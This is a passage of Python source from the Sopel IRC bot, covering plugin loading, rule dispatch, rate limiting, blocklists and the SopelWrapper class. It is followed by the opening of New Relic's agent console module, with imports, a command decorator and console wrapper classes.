will send a ``QUIT`` message. Otherwise, it raises a
:exc:`KeyboardInterrupt` error.
.. note::
Per the Python documentation of :func:`signal.signal`:
When threads are enabled, this function can only be called from
the main thread; attempting to call it from other threads will
cause a :exc:`ValueError` exception to be raised.
"""
for obj in SIGNALS:
signal.signal(obj, self._signal_handler)
def _signal_handler(self, sig, frame):
if sig in QUIT_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got quit signal, sending QUIT to server.")
self.quit('Closing')
else:
self.hasquit = True # mark the bot as "want to quit"
LOGGER.warning("Got quit signal.")
raise KeyboardInterrupt
elif sig in RESTART_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got restart signal, sending QUIT to server.")
self.restart('Restarting')
else:
LOGGER.warning("Got restart signal.")
self.wantsrestart = True # mark the bot as "want to restart"
self.hasquit = True # mark the bot as "want to quit"
raise KeyboardInterrupt
# setup
def setup(self):
"""Set up Sopel bot before it can run.
The setup phase is in charge of:
* setting up logging (configure Python's built-in :mod:`logging`)
* setting up the bot's plugins (load, setup, and register)
* starting the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.post_setup()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
"""Load plugins into the bot."""
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info("Loading plugins...")
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error loading %s: %s", name, e)
except SystemExit:
load_error = load_error + 1
LOGGER.exception(
"Error loading %s (plugin tried to exit)", name)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error in %s setup: %s", name, e)
else:
load_success = load_success + 1
LOGGER.info("Plugin loaded: %s", name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
"Registered %d plugins, %d failed, %d disabled",
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
# post setup
def post_setup(self):
"""Perform post-setup actions.
This method handles everything that should happen after all the plugins
are loaded, and before the bot can connect to the IRC server.
At the moment, this method checks for undefined configuration options,
and starts the job scheduler.
.. versionadded:: 7.1
"""
settings = self.settings
for section_name, section in settings.get_defined_sections():
defined_options = {
settings.parser.optionxform(opt)
for opt, _ in inspect.getmembers(section)
if not opt.startswith('_')
}
for option_name in settings.parser.options(section_name):
if option_name not in defined_options:
LOGGER.warning(
"Config option `%s.%s` is not defined by its section "
"and may not be recognized by Sopel.",
section_name,
option_name,
)
self._scheduler.start()
# plugins management
def reload_plugin(self, name):
"""Reload a plugin.
:param str name: name of the plugin to reload
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
This function runs the plugin's shutdown routine and unregisters the
plugin from the bot. Then this function reloads the plugin, runs its
setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def reload_plugins(self):
"""Reload all registered plugins.
First, this function runs all plugin shutdown routines and unregisters
all plugins. Then it reloads all plugins, runs their setup routines, and
registers them again.
"""
registered = list(self._plugins.items())
# tear down all plugins
for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry.
:param plugin: loaded plugin to add
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
self._plugins[plugin.name] = plugin
self.register_callables(callables)
self.register_jobs(jobs)
self.register_shutdowns(shutdowns)
self.register_urls(urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry.
:param plugin: loaded plugin to remove
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove plugin rules, jobs, shutdown functions, and url callbacks
self._rules_manager.unregister_plugin(name)
self._scheduler.unregister_plugin(name)
self.unregister_shutdowns(shutdowns)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Check if the bot has registered a plugin of the specified name.
:param str name: name of the plugin to check for
:return: whether the bot has a plugin named ``name`` registered
:rtype: bool
"""
return name in self._plugins
def get_plugin_meta(self, name):
"""Get info about a registered plugin by its name.
:param str name: name of the plugin about which to get info
:return: the plugin's metadata
(see :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
:rtype: :class:`dict`
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
return self._plugins[name].get_meta_description()
# callable management
def register_callables(self, callables):
match_any = re.compile(r'.*')
settings = self.settings
for callbl in callables:
rules = getattr(callbl, 'rule', [])
lazy_rules = getattr(callbl, 'rule_lazy_loaders', [])
find_rules = getattr(callbl, 'find_rules', [])
lazy_find_rules = getattr(callbl, 'find_rules_lazy_loaders', [])
search_rules = getattr(callbl, 'search_rules', [])
lazy_search_rules = getattr(callbl, 'search_rules_lazy_loaders', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
is_rule = any([
rules,
lazy_rules,
find_rules,
lazy_find_rules,
search_rules,
lazy_search_rules,
])
is_command = any([commands, nick_commands, action_commands])
if rules:
rule = plugin_rules.Rule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_rules:
try:
rule = plugin_rules.Rule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register rule: %s', err)
if find_rules:
rule = plugin_rules.FindRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_find_rules:
try:
rule = plugin_rules.FindRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register find rule: %s', err)
if search_rules:
rule = plugin_rules.SearchRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_search_rules:
try:
rule = plugin_rules.SearchRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register search rule: %s', err)
if commands:
rule = plugin_rules.Command.from_callable(settings, callbl)
self._rules_manager.register_command(rule)
if nick_commands:
rule = plugin_rules.NickCommand.from_callable(
settings, callbl)
self._rules_manager.register_nick_command(rule)
if action_commands:
rule = plugin_rules.ActionCommand.from_callable(
settings, callbl)
self._rules_manager.register_action_command(rule)
if not is_command and not is_rule:
callbl.rule = [match_any]
self._rules_manager.register(
plugin_rules.Rule.from_callable(self.settings, callbl))
def register_jobs(self, jobs):
for func in jobs:
job = sopel.tools.jobs.Job.from_callable(self.settings, func)
self._scheduler.register(job)
def unregister_jobs(self, jobs):
for job in jobs:
self._scheduler.remove_callable_job(job)
def register_shutdowns(self, shutdowns):
# Append plugin's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods = self.shutdown_methods + list(shutdowns)
def unregister_shutdowns(self, shutdowns):
self.shutdown_methods = [
shutdown
for shutdown in self.shutdown_methods
if shutdown not in shutdowns
]
def register_urls(self, urls):
for func in urls:
url_regex = getattr(func, 'url_regex', [])
url_lazy_loaders = getattr(func, 'url_lazy_loaders', None)
if url_regex:
rule = plugin_rules.URLCallback.from_callable(
self.settings, func)
self._rules_manager.register_url_callback(rule)
if url_lazy_loaders:
try:
rule = plugin_rules.URLCallback.from_callable_lazy(
self.settings, func)
self._rules_manager.register_url_callback(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error("Cannot register URL callback: %s", err)
# message dispatch
def call_rule(self, rule, sopel, trigger):
# rate limiting
if not trigger.admin and not rule.is_unblockable():
if rule.is_rate_limited(trigger.nick):
return
if not trigger.is_privmsg and rule.is_channel_rate_limited(trigger.sender):
return
if rule.is_global_rate_limited():
return
# channel config
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
if '*' in disabled_plugins:
return
elif rule.get_plugin_name() in disabled_plugins:
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
disabled_commands = disabled_commands.get(rule.get_plugin_name(), [])
if rule.get_rule_label() in disabled_commands:
return
try:
rule.execute(sopel, trigger)
except KeyboardInterrupt:
raise
except Exception as error:
self.error(trigger, exception=error)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate limits or other restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded plugins/plugin methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
LOGGER.debug(
"Evaluating configuration for %s.%s in channel %s",
func.plugin_name, func.__name__, trigger.sender
)
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
# if "*" is used, we are disabling all plugins on provided channel
if '*' in disabled_plugins:
LOGGER.debug(
"All plugins disabled in %s; skipping execution of %s.%s",
trigger.sender, func.plugin_name, func.__name__
)
return
if func.plugin_name in disabled_plugins:
LOGGER.debug(
"Plugin %s is disabled in %s; skipping execution of %s",
func.plugin_name, trigger.sender, func.__name__
)
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.plugin_name in disabled_commands:
if func.__name__ in disabled_commands[func.plugin_name]:
LOGGER.debug(
"Skipping execution of %s.%s in %s: disabled_commands matched",
func.plugin_name, func.__name__, trigger.sender
)
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param pretrigger: a parsed message from the server
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
The ``pretrigger`` (a parsed message) is used to find matching rules;
it will retrieve them by order of priority, and execute them. It runs
triggered rules in separate threads, unless they are marked otherwise.
However, it won't run triggered blockable rules at all when they can't
be executed for blocked nickname or hostname.
.. seealso::
The pattern matching is done by the
:class:`Rules Manager<sopel.plugins.rules.Manager>`.
"""
# list of commands running in separate threads for this dispatch
running_triggers = []
# nickname/hostname blocking
nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_rules = set()
# account info
nick = pretrigger.nick
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
# skip processing replayed messages
if "time" in pretrigger.tags and pretrigger.sender in self.channels:
join_time = self.channels[pretrigger.sender].join_time
if join_time is not None and pretrigger.time < join_time:
return
for rule, match in self._rules_manager.get_triggered_rules(self, pretrigger):
trigger = Trigger(self.settings, pretrigger, match, account)
is_unblockable = trigger.admin or rule.is_unblockable()
if blocked and not is_unblockable:
list_of_blocked_rules.add(str(rule))
continue
wrapper = SopelWrapper(
self, trigger, output_prefix=rule.get_output_prefix())
if rule.is_threaded():
# run in a separate thread
targs = (rule, wrapper, trigger)
t = threading.Thread(target=self.call_rule, args=targs)
plugin_name = rule.get_plugin_name()
rule_label = rule.get_rule_label()
t.name = '%s-%s-%s' % (t.name, plugin_name, rule_label)
t.start()
running_triggers.append(t)
else:
# direct call
self.call_rule(rule, wrapper, trigger)
# update currently running triggers
self._update_running_triggers(running_triggers)
if list_of_blocked_rules:
if nick_blocked and host_blocked:
block_type = 'both blocklists'
elif nick_blocked:
block_type = 'nick blocklist'
else:
block_type = 'host blocklist'
LOGGER.debug(
"%s prevented from using %s by %s.",
pretrigger.nick,
', '.join(list_of_blocked_rules),
block_type,
)
@property
def running_triggers(self):
"""Current active threads for triggers.
:return: the running thread(s) currently processing trigger(s)
:rtype: :term:`iterable`
This is for testing and debugging purposes only.
"""
with self._running_triggers_lock:
return [t for t in self._running_triggers if t.is_alive()]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
# event handlers
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
:param scheduler: the job scheduler that errored
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
"""Called when a job from the Job Scheduler fails.
:param scheduler: the job scheduler responsible for the errored ``job``
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param job: the Job that errored
:type job: :class:`sopel.tools.jobs.Job`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error.
:param trigger: the ``Trigger``\\ing line (if available)
:type trigger: :class:`sopel.trigger.Trigger`
:param Exception exception: the exception raised by the error (if
available)
"""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.utcnow()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
"""Internal bot shutdown method."""
LOGGER.info("Shutting down")
# Stop Job Scheduler
LOGGER.info("Stopping the Job Scheduler.")
self._scheduler.stop()
try:
self._scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception("Unable to stop the Job Scheduler.")
else:
LOGGER.info("Job Scheduler stopped.")
self._scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
"Calling shutdown for %d plugins.", len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
"Calling %s.%s",
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception("Error calling shutdown method: %s", e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
# URL callbacks management
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Stores registered callbacks in an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
self._url_callbacks[pattern] = callback
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def unregister_url_callback(self, pattern, callback):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to remove
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Deletes registered callbacks from an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
try:
del self._url_callbacks[pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks whose regex pattern matches the ``url``.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. versionchanged:: 8.0
Searches for registered callbacks in an internal property instead
of ``bot.memory['url_callbacks']``.
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in self._url_callbacks.items():
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot.
:param str message: QUIT message to send (e.g. "Be right back!")
"""
self.wantsrestart = True
self.quit(message)
class SopelWrapper:
"""Wrapper around a Sopel instance and a Trigger.
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`~sopel.trigger.Trigger`
:param str output_prefix: prefix for messages sent through this wrapper
(e.g. plugin tag)
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>`
to the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger, output_prefix=''):
if not output_prefix:
# Just in case someone passes in False, None, etc.
output_prefix = ''
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
object.__setattr__(self, '_out_pfx', output_prefix)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1, truncation='', trailing=''):
"""Override ``Sopel.say`` to use trigger source by default.
:param str message: message to say
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param int max_messages: split ``message`` into at most this many
messages if it is too long to fit into one
line (optional)
:param str truncation: string to indicate that the ``message`` was
truncated (optional)
:param str trailing: string that should always appear at the end of
``message`` (optional)
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
For more details about the optional arguments to this wrapper
method, consult the documentation for :meth:`sopel.bot.Sopel.say`.
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(self._out_pfx + message, destination, max_messages, truncation, trailing)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to use trigger source by default.
:param str message: action message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to use trigger source by default.
:param str message: notice message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(self._out_pfx + message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to ``reply_to`` sender by default.
:param str message: reply message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param str reply_to: person to reply to; defaults to
:attr:`trigger.nick <sopel.trigger.Trigger.nick>`
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
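
# Editor's note: an illustrative sketch of what a plugin callable looks like
# from the wrapper's point of view. In a real plugin module this function would
# be decorated with ``@sopel.plugin.command('hello')`` and loaded by the plugin
# machinery; it is defined here only as documentation and is never registered.
def _example_plugin_callable(bot, trigger):
    """Reply to the sender using the SopelWrapper passed in as ``bot``."""
    # say() defaults to trigger.sender; reply() also prefixes the sender's nick
    bot.reply('Hello!')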
|
console.py
|
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import atexit
import cmd
import code
import functools
import glob
import inspect
import optparse
import os
import shlex
import socket
import sys
import threading
import traceback
import time
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
try:
import __builtin__
except ImportError:
import builtins as __builtin__
def _argspec_py2(func):
return inspect.getargspec(func)
def _argspec_py3(func):
a = inspect.getfullargspec(func)
return (a.args, a.varargs, a.varkw, a.defaults)
if hasattr(inspect, 'getfullargspec'):
_argspec = _argspec_py3
else:
_argspec = _argspec_py2
from newrelic.core.agent import agent_instance
from newrelic.core.config import global_settings, flatten_settings
from newrelic.api.transaction import Transaction
from newrelic.api.object_wrapper import ObjectWrapper
from newrelic.core.trace_cache import trace_cache
_trace_cache = trace_cache()
def shell_command(wrapped):
args, varargs, keywords, defaults = _argspec(wrapped)
parser = optparse.OptionParser()
for name in args[1:]:
parser.add_option('--%s' % name, dest=name)
@functools.wraps(wrapped)
def wrapper(self, line):
result = shlex.split(line)
(options, args) = parser.parse_args(result)
kwargs = {}
for key, value in options.__dict__.items():
if value is not None:
kwargs[key] = value
return wrapped(self, *args, **kwargs)
if wrapper.__name__.startswith('do_'):
prototype = wrapper.__name__[3:] + ' ' + inspect.formatargspec(
args[1:], varargs, keywords, defaults)
if hasattr(wrapper, '__doc__') and wrapper.__doc__ is not None:
wrapper.__doc__ = '\n'.join((prototype,
wrapper.__doc__.lstrip('\n')))
return wrapper
_consoles = threading.local()
def acquire_console(shell):
_consoles.active = shell
def release_console():
del _consoles.active
def setquit():
"""Define new built-ins 'quit' and 'exit'.
These are simply strings that display a hint on how to exit.
"""
if os.sep == ':':
eof = 'Cmd-Q'
elif os.sep == '\\':
eof = 'Ctrl-Z plus Return'
else:
eof = 'Ctrl-D (i.e. EOF)'
class Quitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Use %s() or %s to exit' % (self.name, eof)
def __call__(self, code=None):
# If executed with our interactive console, only raise the
# SystemExit exception but don't close sys.stdout as we are
# not the owner of it.
if hasattr(_consoles, 'active'):
raise SystemExit(code)
# Shells like IDLE catch the SystemExit, but listen when their
# stdin wrapper is closed.
try:
sys.stdin.close()
except Exception:
pass
raise SystemExit(code)
__builtin__.quit = Quitter('quit')
__builtin__.exit = Quitter('exit')
class OutputWrapper(ObjectWrapper):
def flush(self):
try:
shell = _consoles.active
return shell.stdout.flush()
except Exception:
return self._nr_next_object.flush()
def write(self, data):
try:
shell = _consoles.active
return shell.stdout.write(data)
except Exception:
return self._nr_next_object.write(data)
def writelines(self, data):
try:
shell = _consoles.active
return shell.stdout.writelines(data)
except Exception:
return self._nr_next_object.writelines(data)
def intercept_console():
setquit()
sys.stdout = OutputWrapper(sys.stdout, None, None)
sys.stderr = OutputWrapper(sys.stderr, None, None)
class EmbeddedConsole(code.InteractiveConsole):
def write(self, data):
self.stdout.write(data)
self.stdout.flush()
def raw_input(self, prompt):
self.stdout.write(prompt)
self.stdout.flush()
line = self.stdin.readline()
line = line.rstrip('\r\n')
return line
class ConsoleShell(cmd.Cmd):
use_rawinput = 0
def __init__(self):
cmd.Cmd.__init__(self)
self.do_prompt('on')
def emptyline(self):
pass
def help_help(self):
print("""help (command)
Output list of commands or help details for named command.""",
file=self.stdout)
@shell_command
def do_prompt(self, flag=None):
"""
Enable or disable the console prompt."""
if flag == 'on':
self.prompt = '(newrelic:%d) ' % os.getpid()
elif flag == 'off':
self.prompt = ''
